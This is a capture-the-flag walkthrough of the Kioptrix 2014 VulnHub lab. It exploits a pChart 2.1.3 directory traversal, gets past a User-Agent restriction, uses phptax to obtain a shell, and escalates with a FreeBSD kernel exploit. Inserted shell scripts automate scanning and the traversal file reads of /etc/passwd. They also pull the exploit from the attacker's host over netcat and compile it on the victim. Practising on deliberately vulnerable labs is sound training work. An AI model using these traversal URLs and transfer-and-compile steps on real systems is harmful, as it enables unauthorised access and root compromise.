KIOPTRIX 2014 (#5)
- Layout for this exercise:

1 - INTRODUCTION
- The goal of this exercise is to study the hacking process for the vulnerable machine Kioptrix 2014 (#5), from enumeration to root.
- Kioptrix 2014 (#5) can be downloaded from here:
https://www.vulnhub.com/entry/kioptrix-2014-5,62/

- Once downloaded, extracted and opened with VMware:

2 - ENUMERATION
- First, netdiscover shows only one host on the local network whose MAC vendor is VMware, 192.168.1.159, so it should be the vulnerable Kioptrix machine:


- Scanning with Nmap, there are only two open ports (80 and 8080), both running the Apache web server:

- Nmap's OS fingerprint also reports FreeBSD 7.0|8.0|9.0, a detail that matters later when looking for a privilege escalation exploit.
- Using dirb to brute-force the directories of the website:
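- The three enumeration steps above, scripted so the results are saved to files and the open ports are pulled out for the later steps. This is an added example, not the walkthrough's own commands: interface name, network range, wordlist path and the .gnmap sample are assumptions, and the sample is constructed in the shape nmap writes rather than copied from the VM.

```shell
#!/bin/sh
# Added example (not from the walkthrough): netdiscover, nmap and dirb chained
# so that each stage feeds the next. Interface, range and wordlist are assumptions.

# 1. Find the VM: netdiscover lists ARP replies with the NIC vendor, so the
#    VMware entry singles out the target. -P prints parseable output and exits.
discover_hosts() {  # $1 interface, $2 CIDR range
    netdiscover -i "$1" -r "$2" -P
}

# 2. Full port scan with service and OS detection (-O needs root), saved in
#    normal, XML and grepable form under the given prefix.
scan_target() {  # $1 target ip, $2 output prefix
    nmap -sV -O -p- "$1" -oA "$2"
}

# 3. Print "port/proto service version" for every open port in a .gnmap file.
#    Grepable fields are tab-separated; each port entry is
#    port/state/proto/owner/service/rpcinfo/version/ separated by ", ".
open_ports() {  # reads a .gnmap file on stdin
    awk -F'\t' '/^Host:/ {
        for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) {
            sub(/^Ports: /, "", $i)
            n = split($i, p, /, /)
            for (j = 1; j <= n; j++) {
                split(p[j], f, "/")
                if (f[2] == "open") print f[1] "/" f[3] " " f[5] " " f[7]
            }
        }
    }'
}

# Port numbers of the open http services, one per line.
http_ports() {  # reads a .gnmap file on stdin
    open_ports | awk '$2 == "http" { split($1, a, "/"); print a[1] }'
}

# 4. Directory brute force of one web port (-r: no recursion, -S: quiet).
brute_dirs() {  # $1 target, $2 port, $3 wordlist
    dirb "http://$1:$2/" "$3" -r -S
}

# Constructed .gnmap content in nmap's format (not the VM's real output): one
# closed and two open ports, plus the OS guess the walkthrough mentions.
SAMPLE_GNMAP=$(printf 'Host: 192.168.1.159 ()\tStatus: Up\nHost: 192.168.1.159 ()\tPorts: 22/closed/tcp//ssh///, 80/open/tcp//http//Apache httpd 2.2.21 ((FreeBSD))/, 8080/open/tcp//http//Apache httpd 2.2.21 ((FreeBSD))/\tOS: FreeBSD 7.0|8.0|9.0\n')

# Usage: sh enum.sh <interface> <cidr> <target-ip>   (run as root for -O)
if [ "$#" -eq 3 ]; then
    discover_hosts "$1" "$2"
    scan_target "$3" scan
    http_ports < scan.gnmap | while read -r port; do
        brute_dirs "$3" "$port" /usr/share/dirb/wordlists/common.txt
    done
else
    printf '%s\n' "$SAMPLE_GNMAP" | open_ports   # offline: parse the sample
fi
```

- Without arguments the script only parses the constructed sample, which is enough to check the parser; with an interface, range and target it runs the real tools. Parsing the grepable output rather than eyeballing the screenshot is what lets the dirb stage cover port 8080 as well as 80.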

- Trying to connect to the web server on port 8080, the answer is a Forbidden message:

- Connecting to the web server on port 80, the default "It works!" page is shown:

- Viewing the page source, we find a reference to pChart2.1.3:


- pChart is a PHP library for generating anti-aliased charts and images directly on the web server:
http://www.pchart.net/
- Browsing into the pChart2.1.3 folder:


- For instance, opening the /examples folder:

3 - EXPLOITATION
- First, let's check whether there are any known vulnerabilities for pChart 2.1.3:

- There are a number of vulnerabilities affecting the /examples folder:

- Let's focus on the directory traversal:

- Crafting the directory traversal URL to read a file of our choice:

- The attack is successful:

- At this point, remember (from Nmap) that we are dealing with a FreeBSD 7.0|8.0|9.0 host running Apache 2.2.21.
- On FreeBSD, the Apache 2.2 port installs its configuration file at /usr/local/etc/apache22/httpd.conf:
https://www.freebsd.org/doc/handbook/network-apache.html
- Now, let's craft the traversal URL to read httpd.conf and see what it tells us:

- The directory traversal is again successful:


- Note the last part of the output: requests to the port 8080 virtual host are only allowed when the User-Agent is Mozilla/4.0.
- Connecting to 192.168.1.159:8080 with curl and the header "User-Agent: Mozilla/4.0", a directory listing with an entry named phptax appears:

- phptax is an old PHP web application for preparing US income tax returns.
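- The exploitation steps so far (reading files through pChart, spotting the User-Agent rule in httpd.conf, and requesting port 8080 as a Mozilla/4.0 client) scripted with curl. This is an added example and not the walkthrough's own commands: the URL form is the one from the published pChart 2.1.3 advisory, the target address is the walkthrough's, and the httpd.conf excerpt is constructed in the shape the walkthrough describes (a SetEnvIf rule plus an "Allow from env=" directive), not copied from the VM.

```shell
#!/bin/sh
# Added example (not from the walkthrough): pChart 2.1.3 file read, httpd.conf
# analysis and the User-Agent-gated request, all with curl and awk.

# URL for the published pChart 2.1.3 traversal in examples/index.php.
# $1 target, $2 absolute path on the victim. The advisory's PoC passes
# %2f..%2f..%2f<path> as the Script parameter; that prefix is kept as published.
pchart_read_url() {
    printf 'http://%s/pChart2.1.3/examples/index.php?Action=View&Script=%%2f..%%2f..%%2f%s\n' \
        "$1" "${2#/}"
}

# Fetch a file through the traversal (network access; only used with a target).
pchart_read_file() {  # $1 target, $2 absolute path
    curl -s "$(pchart_read_url "$1" "$2")"
}

# Constructed httpd.conf excerpt (assumption, not the VM's file): SetEnvIf tags
# requests whose User-Agent matches the regex, and the port 8080 directory only
# allows requests carrying that tag. This is Apache 2.2 access-control syntax.
SAMPLE_HTTPD_CONF='Listen 80
Listen 8080
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
    <Directory "/usr/local/www/apache22/data2">
        Options Indexes FollowSymLinks
        Order allow,deny
        Allow from env=Mozilla4_browser
    </Directory>
</VirtualHost>'

# Print "<env-name> <user-agent-regex>" for every SetEnvIf User-Agent rule whose
# variable is later used in an "Allow from env=" directive: those are the gates
# a client has to satisfy, and the regex tells us what to send.
ua_gates() {  # reads httpd.conf text on stdin
    awk '
        $1 == "SetEnvIf" && $2 == "User-Agent" { pattern[$4] = $3 }
        $1 == "Allow" && $2 == "from" && $3 ~ /^env=/ {
            name = substr($3, 5)
            if (name in pattern) print name, pattern[name]
        }'
}

# Request the port 8080 site with a matching User-Agent (-A sets the header).
fetch_8080() {  # $1 target, $2 user-agent (default: the value the gate expects)
    curl -s -i -A "${2:-Mozilla/4.0}" "http://$1:8080/"
}

# Usage: sh pchart.sh 192.168.1.159   (without a target only the sample is parsed)
if [ -n "${1:-}" ]; then
    pchart_read_file "$1" /etc/passwd
    pchart_read_file "$1" /usr/local/etc/apache22/httpd.conf | ua_gates
    fetch_8080 "$1"
else
    printf '%s\n' "$SAMPLE_HTTPD_CONF" | ua_gates
fi
```

- Run offline, the script prints the gate rule found in the constructed sample (Mozilla4_browser ^Mozilla/4.0). Against the VM, the httpd.conf read is piped straight into ua_gates; if the View action wraps the file in HTML markup, strip that first, since the awk rules key on the first words of each line. Note that SetEnvIf matches a regular expression, so the gate is satisfied by any User-Agent the regex accepts, not only the literal string.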
- Now the browser's User-Agent must be changed to Mozilla/4.0 as well. In Firefox, open about:config and accept the risk warning:

- Search for useragent and add a new String preference (general.useragent.override):

- Enter the preference name and its value, Mozilla/4.0:


- Now the connection to 192.168.1.159:8080 succeeds and the directory listing shows phptax:


- Metasploit includes an exploit module for phptax:



- Setting the module options:

- Running the exploit gives a limited shell as user www:

4 - PRIVILEGE ESCALATION
- Upgrading to an sh shell:

- Checking the exact version: the operating system is FreeBSD 9.0:

- Searching for FreeBSD 9.0 vulnerabilities:

- There is an interesting one for privilege escalation (a local kernel exploit, so it has to match the exact kernel version and architecture found above):

- Downloading the exploit and copying it to a working directory:

- Setting up a netcat listener on the attacking machine to transfer the exploit to the victim:

- Connecting from the victim side with netcat and writing into /tmp (which is writable), the transfer succeeds:


- Listing the transferred exploit:

- Compiling it on the victim:


- Running the exploit, a root shell is obtained:
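- The transfer and build steps above, with the check the walkthrough skips: a netcat transfer can be cut short without any error, so the victim's copy should be hashed and compared against the original before compiling it. This is an added example, not the walkthrough's commands: attacker address, port, file names and the compiler name (cc) are assumptions.

```shell
#!/bin/sh
# Added example (not from the walkthrough): push the exploit source to the victim
# over netcat, confirm the copy is complete, then build it. Addresses, ports and
# file names are assumptions.

# SHA-256 of a file on either side: Linux ships sha256sum, FreeBSD ships sha256,
# and openssl covers anything else.
sha256_of() {  # $1 file
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    elif command -v sha256 >/dev/null 2>&1; then
        sha256 -q "$1"
    else
        openssl dgst -sha256 "$1" | awk '{print $NF}'
    fi
}

# Attacker side: serve the file once. -w 10 closes the connection after the
# victim has been idle for 10 s, so the listener does not hang forever.
# (netcat-traditional and netcat-openbsd differ in flags; -l -p works on Kali.)
serve_file() {  # $1 file, $2 port
    nc -l -p "$2" -w 10 < "$1"
}

# Victim side (FreeBSD nc): fetch into /tmp, the directory the walkthrough found
# writable, then report size and hash so they can be compared with the original.
pull_file() {  # $1 attacker ip, $2 port, $3 destination path
    nc -w 10 "$1" "$2" > "$3"
    printf '%s %s\n' "$(wc -c < "$3" | tr -d ' ')" "$(sha256_of "$3")"
}

# True when the hash reported from the victim matches the attacker's original.
copy_matches() {  # $1 hash reported by the victim, $2 local original
    [ "$1" = "$(sha256_of "$2")" ]
}

# Build only after copy_matches succeeds: a truncated source fails to compile at
# best and misbehaves at worst, and a kernel exploit is not something to run blind.
build_exploit() {  # $1 source, $2 output binary
    cc -o "$2" "$1" && chmod 700 "$2"
}

# Usage (attacker): sh xfer.sh serve exploit.c 4444
# Usage (victim):   sh xfer.sh pull 192.168.1.100 4444 /tmp/exploit.c
#                   sh xfer.sh build /tmp/exploit.c /tmp/exploit
case "${1:-}" in
    serve) serve_file "$2" "$3" ;;
    pull)  pull_file "$2" "$3" "$4" ;;
    build) build_exploit "$2" "$3" ;;
esac
```

- The victim prints its size and hash after the pull; feeding that hash to copy_matches on the attacking machine gives a yes/no answer before anything is compiled. The same script is usable on both sides because it only relies on POSIX sh, nc and whichever SHA-256 tool the host has.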

5 - CAPTURING THE FLAG
- Going to the /root folder:


etc ...